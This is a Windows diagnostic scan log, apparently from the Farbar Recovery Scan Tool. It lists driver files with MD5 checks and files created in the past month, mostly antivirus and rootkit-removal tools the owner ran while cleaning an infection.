C:\Windows\System32\DRIVERS\BthEnum.sys CF98190A94F62E405C8CB255018B2315
C:\Windows\system32\drivers\bthmodem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bthpan.sys 02DD601B708DD0667E1331FA8518E9FF
C:\Windows\System32\Drivers\BTHport.sys 738D0E9272F59EB7A1449C3EC118E6C4
C:\Windows\System32\Drivers\BTHUSB.sys F188B7394D81010767B6DF3178519A37
C:\Windows\System32\DRIVERS\btwampfl.sys DD34E175FB904CB0F356B04D52CFAEAD
C:\Windows\System32\drivers\btwaudio.sys A771078558477068DFD8037B82EB00F8
C:\Windows\System32\DRIVERS\btwavdt.sys 9FF58F76024D25784755B01F926B00BE
C:\Windows\System32\DRIVERS\btwl2cap.sys B1ACFD00CDD13B48D86F46BFEC153BF9
C:\Windows\System32\DRIVERS\btwrchid.sys EDD953D635F3AA89EF902E3F82D60D22
C:\Windows\System32\DRIVERS\cdfs.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdrom.sys ==> MD5 is legit
C:\Windows\system32\drivers\circlass.sys ==> MD5 is legit
C:\Windows\System32\CLFS.sys 3D67C27DD17B254D7915FA16A5AE3573
C:\Windows\system32\drivers\CmBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\cmdide.sys ==> MD5 is legit
C:\Windows\System32\Drivers\cng.sys A98CED39AD91B445E2E442A9BD67E8B4
C:\Windows\system32\drivers\compbatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\lvbflt64.sys 0C5B0DF7EF9F719EBAE9F8FE70E083A9
C:\Windows\System32\DRIVERS\CompositeBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\crcdisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\csc.sys ==> MD5 is legit
C:\Windows\System32\drivers\DDDriver64Dcsa.sys 3802CBF4BDDE6F99974B27EE1782E5F9
C:\Windows\System32\drivers\DellProf.sys DC3BD578642252FD9569B9CD75CEF81E
C:\Windows\System32\Drivers\dfsc.sys 9B38580063D281A99E68EF5813022A5F
C:\Windows\System32\drivers\discache.sys ==> MD5 is legit
C:\Windows\System32\drivers\disk.sys 616387BBD83372220B09DE95F4E67BBC
C:\Windows\system32\drivers\dmvsc.sys 5DB085A8A6600BE6401F2B24EECB5415
C:\Windows\system32\drivers\drmkaud.sys 26FE888505E5A945B0536AF9A2A27A6F
C:\Windows\System32\drivers\dxgkrnl.sys 3A9D7D464BDB3B70D7ECF689ADABBD4D
C:\Windows\System32\DRIVERS\e1d62x64.sys F2E765FA3A1261A11A6D51B7ED370727
C:\Windows\system32\drivers\evbda.sys ==> MD5 is legit
C:\Windows\system32\drivers\elxstor.sys ==> MD5 is legit
C:\EEK\bin64\epp.sys 6ED8563FE894D574B97809CF53769DAD
C:\Windows\system32\drivers\errdev.sys ==> MD5 is legit
C:\Windows\System32\Drivers\exfat.sys ==> MD5 is legit
C:\Windows\System32\Drivers\fastfat.sys ==> MD5 is legit
C:\Windows\system32\drivers\fdc.sys ==> MD5 is legit
C:\Windows\System32\drivers\fileinfo.sys ==> MD5 is legit
C:\Windows\System32\drivers\filetrace.sys ==> MD5 is legit
C:\Windows\system32\drivers\flpydisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\fltmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\FsDepends.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Fs_Rec.sys 6BD9295CC032DD3077C671FCCF579A7B
C:\Windows\System32\DRIVERS\fvevol.sys 8F6322049018354F45F05A2FD2D4E5E0
C:\Windows\system32\drivers\gagp30kx.sys ==> MD5 is legit
C:\Windows\system32\drivers\hcw85cir.sys ==> MD5 is legit
C:\Windows\System32\drivers\HdAudio.sys 975761C778E33CD22498059B91E7373A
C:\Windows\System32\DRIVERS\HDAudBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\HidBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\hidbth.sys ==> MD5 is legit
C:\Windows\system32\drivers\hidir.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\hidkmdf.sys 436646F307122622978338DE503FCB13
C:\Windows\System32\DRIVERS\hidusb.sys ==> MD5 is legit
C:\Windows\system32\drivers\HpSAMD.sys ==> MD5 is legit
C:\Windows\System32\drivers\HTTP.sys F61634BEC53F73702A10DE69F6DCAF57
C:\Windows\System32\drivers\hwpolicy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\i8042prt.sys ==> MD5 is legit
C:\Windows\System32\drivers\iaStorA.sys 12859E1215AA083A42E7ADCDE5C061D1
C:\Windows\System32\drivers\iaStorF.sys 91F97C1A0ABCD7FA487E8EF7A249C15C
C:\Windows\system32\drivers\iaStorV.sys AAAF44DB3BD0B9D1FB6969B23ECC8366
C:\Windows\system32\drivers\iirsp.sys ==> MD5 is legit
C:\Windows\System32\drivers\RTKVHD64.sys 3A2D6740F51BE48C0FD01AD907329DEE
C:\Windows\system32\drivers\intelide.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\intelppm.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ipfltdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\IPMIDrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\ipnat.sys ==> MD5 is legit
C:\Windows\System32\drivers\irenum.sys ==> MD5 is legit
C:\Windows\system32\drivers\isapnp.sys ==> MD5 is legit
C:\Windows\system32\drivers\msiscsi.sys 96BB922A0981BC7432C8CF52B5410FE6
C:\Windows\System32\DRIVERS\iusb3hub.sys A7A2E0D3932B1986990AC7077B1658CD
C:\Windows\System32\DRIVERS\iusb3xhc.sys FD9C74D20E6F97EDC442091F9DBC1189
C:\Windows\System32\DRIVERS\kbdclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdhid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\ksecdd.sys F54475BA70B5CDA4EF11DC44BFB07F40
C:\Windows\System32\Drivers\ksecpkg.sys ED1D1E1AAACF08438F9BCF731C8CA168
C:\Windows\system32\drivers\ksthunk.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\lltdio.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_fc.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas2.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_scsi.sys ==> MD5 is legit
C:\Windows\system32\drivers\luafv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\lvrs64.sys A401CFF74982D8DF851F20307C806073
C:\Windows\System32\DRIVERS\lvuvc64.sys 13384CB5F5813E65F31078D6ABFAAF38
C:\Windows\System32\drivers\MBAMSwissArmy.sys ABB371D9AEF728B0489B0E6872B4A1C0
C:\Windows\system32\drivers\megasas.sys ==> MD5 is legit
C:\Windows\system32\drivers\MegaSR.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\TeeDriverx64.sys F59C2E19189BEB21A57CB2CE32AE1618
C:\Windows\System32\drivers\modem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\monitor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouhid.sys ==> MD5 is legit
C:\Windows\System32\drivers\mountmgr.sys 8ADB5445B29941CB41AF2846FD5C93C7
C:\Windows\system32\drivers\mpio.sys ==> MD5 is legit
C:\Windows\System32\drivers\mpsdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\mrxdav.sys 98DB1790F0A584E0A2528B92B052417F
C:\Windows\System32\DRIVERS\mrxsmb.sys 8A6DD6FDCCC010F7C6480EE7D0C3B92E
C:\Windows\System32\DRIVERS\mrxsmb10.sys 68C12354AEA8FB5B559F5F69EF1C0DF0
C:\Windows\System32\DRIVERS\mrxsmb20.sys 307E956C0DE630EE0ACE657233C0E83F
C:\Windows\system32\drivers\msahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\msdsm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Msfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\mshidkmdf.sys ==> MD5 is legit
C:\Windows\System32\drivers\msisadrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSKSSRV.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSPCLOCK.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSPQM.sys ==> MD5 is legit
C:\Windows\System32\Drivers\MsRPC.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mssmbios.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSTEE.sys ==> MD5 is legit
C:\Windows\system32\drivers\MTConfig.sys ==> MD5 is legit
C:\Windows\System32\Drivers\mup.sys AA0C2BA3782E92BD85E2264BE418E67C
C:\Windows\System32\DRIVERS\nwifi.sys ==> MD5 is legit
C:\Windows\System32\drivers\ndis.sys F7309F42555F8AAB7144A51A1F2585B0
C:\Windows\System32\DRIVERS\ndiscap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndistapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndisuio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiswan.sys ==> MD5 is legit
C:\Windows\System32\Drivers\NDProxy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbios.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbt.sys E47D571FEC2C76E867935109AB2A770C
C:\Windows\System32\DRIVERS\netvsc60.sys 73CE12B8BDD747B0063CB0A7EF44CEA7
C:\Windows\system32\drivers\nfrd960.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\NSKernel.sys 24D99D11E54F0FA87671F219FDCD56A4
C:\Windows\System32\DRIVERS\NSNetmon.sys 2BA56F34568BCF677B31438CF4063605
C:\Windows\System32\Drivers\Npfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Ntfs.sys 47B2D0B31BDC3EBE6090228E2BA3764D
C:\Windows\System32\Drivers\Null.sys ==> MD5 is legit
C:\Windows\System32\drivers\nvhda64v.sys 62CE6D6AA873D2E4AE2F64ED89E6CD83
C:\Windows\System32\DRIVERS\nvlddmkm.sys 1C5855A8A7186513BE3E301CEE171496
C:\Windows\System32\DRIVERS\nvpciflt.sys 6DBDE7A7C81F05C20C82291401627503
C:\Windows\system32\drivers\nvraid.sys 0A92CB65770442ED0DC44834632F66AD
C:\Windows\system32\drivers\nvstor.sys DAB0E87525C10052BF65F06152F37E4A
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys F82BCEB9F57B2959F6AAE2A3DDA892A8
C:\Windows\System32\drivers\nvvad64v.sys F37FE6B15A987AEEC08EEF531F2FAED7
C:\Windows\system32\drivers\nv_agp.sys ==> MD5 is legit
C:\Windows\system32\drivers\ohci1394.sys ==> MD5 is legit
C:\Windows\system32\drivers\parport.sys ==> MD5 is legit
C:\Windows\System32\drivers\partmgr.sys E9766131EEADE40A27DC27D2D68FBA9C
C:\Windows\System32\drivers\pci.sys ==> MD5 is legit
C:\Windows\system32\drivers\pciide.sys ==> MD5 is legit
C:\Windows\system32\drivers\pcmcia.sys ==> MD5 is legit
C:\Windows\System32\drivers\pcw.sys ==> MD5 is legit
C:\Windows\System32\drivers\peauth.sys EA4D67448BE493D543F1730D6CD04694
C:\Windows\System32\DRIVERS\raspptp.sys ==> MD5 is legit
C:\Windows\system32\drivers\processr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pacer.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql2300.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql40xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\qwavedrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasacd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\AgileVpn.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasl2tp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspppoe.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rassstp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdbss.sys 71B6F78D6444CCE6F77BC42917A4E8F7
C:\Windows\System32\DRIVERS\rdpbus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\RDPCDD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpdr.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpencdd.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdprefmp.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpvideominiport.sys 313F68E1A3E6345A4F47A36B07062F34
C:\Windows\System32\Drivers\RDPWD.sys FE571E088C2D83619D2D48D4E961BF41
C:\Windows\System32\drivers\rdyboost.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rfcomm.sys 3DD798846E2C28102B922C56E71B7932
C:\Windows\System32\DRIVERS\rspndr.sys ==> MD5 is legit
C:\Windows\system32\drivers\vms3cap.sys ==> MD5 is legit
C:\Windows\system32\drivers\sbp2port.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\scfilter.sys ==> MD5 is legit
C:\Windows\System32\Drivers\secdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\serenum.sys ==> MD5 is legit
C:\Windows\system32\drivers\serial.sys ==> MD5 is legit
C:\Windows\system32\drivers\sermouse.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffdisk.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_mmc.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_sd.sys ==> MD5 is legit
C:\Windows\system32\drivers\sfloppy.sys ==> MD5 is legit
C:\Windows\system32\drivers\SiSRaid2.sys ==> MD5 is legit
C:\Windows\system32\drivers\sisraid4.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\smb.sys ==> MD5 is legit
C:\Windows\System32\Drivers\spldr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\srv.sys EC666682FE8344CF7E6ED69E74FA9F4F
C:\Windows\System32\DRIVERS\srv2.sys E450C0318DCE8ED28ED272C8806B8495
C:\Windows\System32\DRIVERS\srvnet.sys 9C12C78AD36C23D925711A4640228225
C:\Windows\system32\drivers\stexstor.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsc.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\swenum.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\VMBusVideoM.sys 4CDD7DF58730D23BA9CB5829A6E2ECEA
C:\Windows\System32\drivers\tcpip.sys B2875D7ABB82867DC3AA03D991940201
C:\Windows\System32\DRIVERS\tcpip.sys B2875D7ABB82867DC3AA03D991940201
C:\Windows\System32\drivers\tcpipreg.sys 7FE5586314EE7D6AA8483264A089E5AF
C:\Windows\System32\drivers\tdpipe.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdtcp.sys 51C5ECEB1CDEE2468A1748BE550CFBC8
C:\Windows\System32\DRIVERS\tdx.sys AA77EB517D2F07A947294F260E3ACA83
C:\Windows\System32\DRIVERS\termdd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\Trufos.sys 40A8AB90F3CB342F037B493A8EADE4B9
C:\Windows\System32\DRIVERS\tssecsrv.sys 19BEDA57F3E0A06B8D5EB6D619BD5624
C:\Windows\System32\drivers\tsusbflt.sys E9981ECE8D894CEF7038FD1D040EB426
C:\Windows\system32\drivers\TsUsbGD.sys AD64450A4ABE076F5CB34CC08EEACB07
C:\Windows\System32\DRIVERS\tunnel.sys ==> MD5 is legit
C:\Windows\system32\drivers\uagp35.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\udfs.sys ==> MD5 is legit
C:\Windows\system32\drivers\uliagpkx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\umbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\umpass.sys ==> MD5 is legit
C:\Windows\System32\drivers\usbaudio.sys B0435098C81D04CAFFF80DDB746CD3A2
C:\Windows\system32\drivers\usbccgp.sys 28B81917A195B67617AF7DCF4DFE5736
C:\Windows\system32\drivers\usbcir.sys 80B0F7D5CCF86CEB5D402EAAF61FEC31
C:\Windows\system32\drivers\usbehci.sys B626F048318DAE65A3317F0592BE592C
C:\Windows\system32\drivers\usbhub.sys 390109E8E05BA00375DCB1ED64DC60AF
C:\Windows\system32\drivers\usbohci.sys B4DF0F4C1D9D25DFE1DAD1D8670F1D4F
C:\Windows\System32\DRIVERS\usbprint.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbscan.sys 9661DA76B4531B2DA272ECCE25A8AF24
C:\Windows\System32\DRIVERS\USBSTOR.SYS D029DD09E22EB24318A8FC3D8138BA43
C:\Windows\system32\drivers\usbuhci.sys CFEAAF96E666E3DCBD8F6DFF516784AE
C:\Windows\System32\drivers\vdrvroot.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vgapnp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vga.sys ==> MD5 is legit
C:\Windows\system32\drivers\vhdmp.sys ==> MD5 is legit
C:\Windows\system32\drivers\viaide.sys ==> MD5 is legit
C:\Windows\system32\drivers\VMBusHID.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgrx.sys ==> MD5 is legit
C:\Windows\System32\drivers\volsnap.sys DF8126BD41180351A093A3AD2FC8903B
C:\Windows\system32\drivers\vsmraid.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vwifibus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vwififlt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vwifimp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wachidrouter.sys 8192518C03634C5AE9ABF327CBE162C6
C:\Windows\system32\drivers\wacompen.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wacomrouterfilter.sys 9964F4E598CC594A7397BEBDEDA2EAAD
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\system32\drivers\wd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wdcsam64.sys D0335A55E5C3F812548E18300C2ACB62
C:\Windows\System32\drivers\Wdf01000.sys E2C933EDBC389386EBE6D2BA953F43D8
C:\Windows\System32\DRIVERS\wfplwf.sys ==> MD5 is legit
C:\Windows\System32\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WinUsb.sys FE88B288356E7B47B74B13372ADD906D
C:\Windows\System32\DRIVERS\wmiacpi.sys ==> MD5 is legit
C:\Windows\system32\drivers\ws2ifsl.sys ==> MD5 is legit
C:\Windows\System32\drivers\WudfPf.sys AB886378EEB55C6C75B4F2D14B6C869F
C:\Windows\System32\DRIVERS\WUDFRd.sys DDA4CAF29D8C0A297F886BFE561E6659
C:\Windows\System32\drivers\xspltspk.sys 377F3E3467A8BFA3CDC921AD6425D513
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-10 16:07 - 2017-01-10 16:08 - 00052104 _____ C:\Users\Owner\Downloads\FRST.TXT
2017-01-10 16:07 - 2017-01-10 16:07 - 02419200 _____ (Farbar) C:\Users\Owner\Downloads\FRST64.exe
2017-01-10 16:07 - 2017-01-10 16:07 - 00919040 _____ (Farbar) C:\Windows\MOD_FRST.EXE
2017-01-10 16:07 - 2017-01-10 16:07 - 00019214 _____ C:\Users\Owner\Downloads\ADDITION.TXT
2017-01-10 13:48 - 2017-01-10 13:48 - 00003484 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2017-01-10 00:54 - 2017-01-10 00:54 - 00000238 _____ C:\Users\Owner\Desktop\newyears17 resolutions.txt
2017-01-09 13:44 - 2017-01-09 13:45 - 02747488 _____ (Symantec Corporation) C:\Users\Owner\Downloads\FixPoweliks64.exe
2017-01-09 01:17 - 2017-01-09 01:17 - 00340808 _____ C:\Users\Owner\Downloads\BullGuardDownloaderBPP (1).exe
2017-01-09 01:04 - 2017-01-10 00:42 - 00000356 _____ C:\Windows\system32\config\afw_hm.conf
2017-01-09 01:04 - 2017-01-10 00:42 - 00000004 _____ C:\Windows\system32\config\afw_db.conf
2017-01-09 00:45 - 2017-01-09 01:05 - 00000000 ____D C:\Users\Owner\AppData\Roaming\BullGuard
2017-01-09 00:45 - 2017-01-09 00:45 - 00000992 _____ C:\Users\Public\Desktop\BullGuard Premium Protection.lnk
2017-01-09 00:45 - 2017-01-09 00:45 - 00000000 ____D C:\Windows\System32\Tasks\BullGuard
2017-01-09 00:45 - 2017-01-09 00:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BullGuard
2017-01-09 00:43 - 2017-01-09 00:43 - 00000000 ____D C:\Users\Owner\AppData\Roaming\QuickScan
2017-01-09 00:43 - 2017-01-09 00:43 - 00000000 ____D C:\Program Files\Common Files\BullGuard Ltd
2017-01-09 00:43 - 2017-01-09 00:43 - 00000000 ____D C:\Program Files\BullGuard Ltd
2017-01-09 00:41 - 2017-01-10 16:07 - 00000000 ____D C:\ProgramData\BullGuard
2017-01-09 00:41 - 2017-01-09 00:41 - 00340808 _____ C:\Users\Owner\Downloads\BullGuardDownloaderBPP.exe
2017-01-08 18:29 - 2017-01-08 18:29 - 00224968 _____ (ESET) C:\Users\Owner\Downloads\ESETPoweliksCleaner.exe
2017-01-08 18:29 - 2017-01-08 18:29 - 00000022 _____ C:\Users\Owner\Downloads\ESETPoweliksCleaner.exe_20170108.182950.2584.zip
2017-01-08 18:21 - 2017-01-08 18:21 - 00002954 _____ C:\Windows\System32\Tasks\{528BCCA3-349E-4E64-BAF5-C898CCD7538F}
2017-01-08 18:21 - 2017-01-08 18:21 - 00002954 _____ C:\Windows\System32\Tasks\{0BBD4685-2739-46A6-8DF8-C548A726405D}
2017-01-08 18:09 - 2017-01-08 18:09 - 02826776 _____ (Symantec Corporation) C:\Users\Owner\Downloads\stupid symant to clear Kotver64.exe
2017-01-08 17:05 - 2017-01-08 17:05 - 00000398 _____ C:\Users\Owner\Desktop\Scan_170108-170522.txt
2017-01-08 17:00 - 2017-01-08 17:34 - 00000000 ____D C:\EEK
2017-01-08 16:47 - 2017-01-08 17:00 - 280354360 _____ C:\Users\Owner\Downloads\EmsisoftEmergencyKit.exe
2017-01-08 16:13 - 2017-01-08 16:13 - 00039857 _____ C:\Users\Owner\Downloads\Shortcut.txt
2017-01-08 15:05 - 2017-01-08 15:11 - 00000000 ____D C:\Users\Owner\Desktop\mbar
2017-01-08 12:39 - 2017-01-08 12:39 - 00852798 _____ C:\Users\Owner\Downloads\SecurityCheck (1).exe
2017-01-08 11:53 - 2017-01-08 11:53 - 00005216 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.53.02_log.txt
2017-01-08 11:49 - 2017-01-08 11:51 - 01981278 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.49.47_log.txt
2017-01-08 11:47 - 2017-01-08 11:51 - 00000000 ____D C:\TDSSKiller_Quarantine
2017-01-08 11:46 - 2017-01-08 11:48 - 01850862 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.46.26_log.txt
2017-01-08 11:44 - 2017-01-08 11:45 - 00230270 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.44.45_log.txt
2017-01-08 11:42 - 2017-01-08 11:42 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller (1).exe
2017-01-08 11:30 - 2017-01-08 11:35 - 108968280 _____ (Kaspersky Lab ZAO) C:\Users\Owner\Downloads\KVRT.exe
2017-01-08 11:01 - 2017-01-08 15:11 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-01-08 11:00 - 2017-01-08 11:01 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Owner\Downloads\mbar-1.09.3.1001.exe
2017-01-08 10:59 - 2017-01-08 10:59 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller.exe
2017-01-08 10:50 - 2017-01-10 16:07 - 00000000 ____D C:\FRST
2017-01-08 10:44 - 2017-01-08 10:44 - 00000000 ____D C:\Users\Owner\Desktop\hunting down rootfiles reports
2017-01-08 10:41 - 2017-01-08 10:41 - 00852798 _____ C:\Users\Owner\Downloads\SecurityCheck.exe
2017-01-07 22:17 - 2017-01-08 16:34 - 00000000 ____D C:\AdwCleaner
2017-01-07 22:17 - 2017-01-07 22:17 - 03988944 _____ C:\Users\Owner\Downloads\AdwCleaner.exe
2017-01-07 21:51 - 2017-01-08 16:29 - 00001951 _____ C:\Users\Owner\Desktop\JRT.txt
2017-01-07 21:46 - 2017-01-07 21:48 - 01663040 _____ (Malwarebytes) C:\Users\Owner\Downloads\JRT.exe
2017-01-07 21:35 - 2017-01-10 00:01 - 00002432 _____ C:\Users\Owner\Desktop\Rkill.txt
2017-01-07 21:34 - 2017-01-07 21:34 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Owner\Downloads\iExplore.exe
2017-01-07 21:28 - 2017-01-08 19:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2017-01-07 21:25 - 2017-01-07 21:26 - 00791393 _____ (Lars Hederer ) C:\Users\Owner\Downloads\erunt-setup.exe
2017-01-04 23:26 - 2017-01-04 23:26 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsigncf631b6ff9651c8a
2017-01-04 23:26 - 2017-01-04 23:26 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsignb4188614afff68b1
2017-01-04 23:26 - 2017-01-04 23:26 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign9c68d00380933832
2017-01-04 23:25 - 2017-01-04 23:25 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsignc096e41f88628fbf
2017-01-04 23:25 - 2017-01-04 23:25 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign9eeea7640dd0c692
2017-01-04 23:25 - 2017-01-04 23:25 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign6e08fc3e0ff75b8f
2017-01-03 15:01 - 2017-01-03 15:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2017-01-03 14:57 - 2017-01-03 14:57 - 00001559 _____ C:\Users\Public\Desktop\iTunes.lnk
2017-01-03 14:57 - 2017-01-03 14:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2017-01-03 14:57 - 2017-01-03 14:57 - 00000000 ____D C:\Program Files\iPod
2016-12-25 23:07 - 2016-12-25 23:07 - 357362533 _____ C:\Users\Owner\Downloads\aaron griffin brushes.abr
2016-12-25 23:05 - 2016-12-25 23:05 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsignd3e98e4f088b7db6
2016-12-25 23:05 - 2016-12-25 23:05 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign4021b502d324f4a5
2016-12-25 23:05 - 2016-12-25 23:05 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign3b4c000cb30b224b
2016-12-24 13:55 - 2016-12-24 13:55 - 00000000 ____D C:\ProgramData\PC-Doctor, Inc
2016-12-21 16:49 - 2016-12-21 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-12-21 12:39 - 2017-01-10 00:43 - 00250816 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-21 12:39 - 2017-01-08 15:05 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2016-12-21 12:39 - 2017-01-08 11:01 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-12-21 12:39 - 2017-01-04 14:46 - 00081696 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2016-12-21 12:39 - 2017-01-01 21:57 - 00102856 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2016-12-21 12:39 - 2017-01-01 21:57 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-12-21 12:39 - 2016-12-21 12:39 - 00000932 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2016-12-21 12:39 - 2016-12-21 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2016-12-21 12:39 - 2016-12-14 12:55 - 00077416 _____ C:\Windows\system32\Drivers\mbae64.sys
2016-12-21 12:38 - 2016-12-21 12:38 - 00000000 ____D C:\Users\Owner\AppData\Local\Programs
2016-12-21 12:12 - 2016-12-21 12:27 - 54199488 _____ (Malwarebytes ) C:\Users\Owner\Desktop\mb3-setup-consumer-3.0.5.1299.exe
2016-12-21 10:15 - 2016-12-21 10:15 - 00075888 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2016-12-21 10:15 - 2016-12-21 10:15 - 00075888 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2016-12-21 10:15 - 2016-12-21 10:15 - 00075888 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2016-12-21 10:15 - 2016-12-21 10:15 - 00042096 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2016-12-20 23:35 - 2016-09-12 13:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
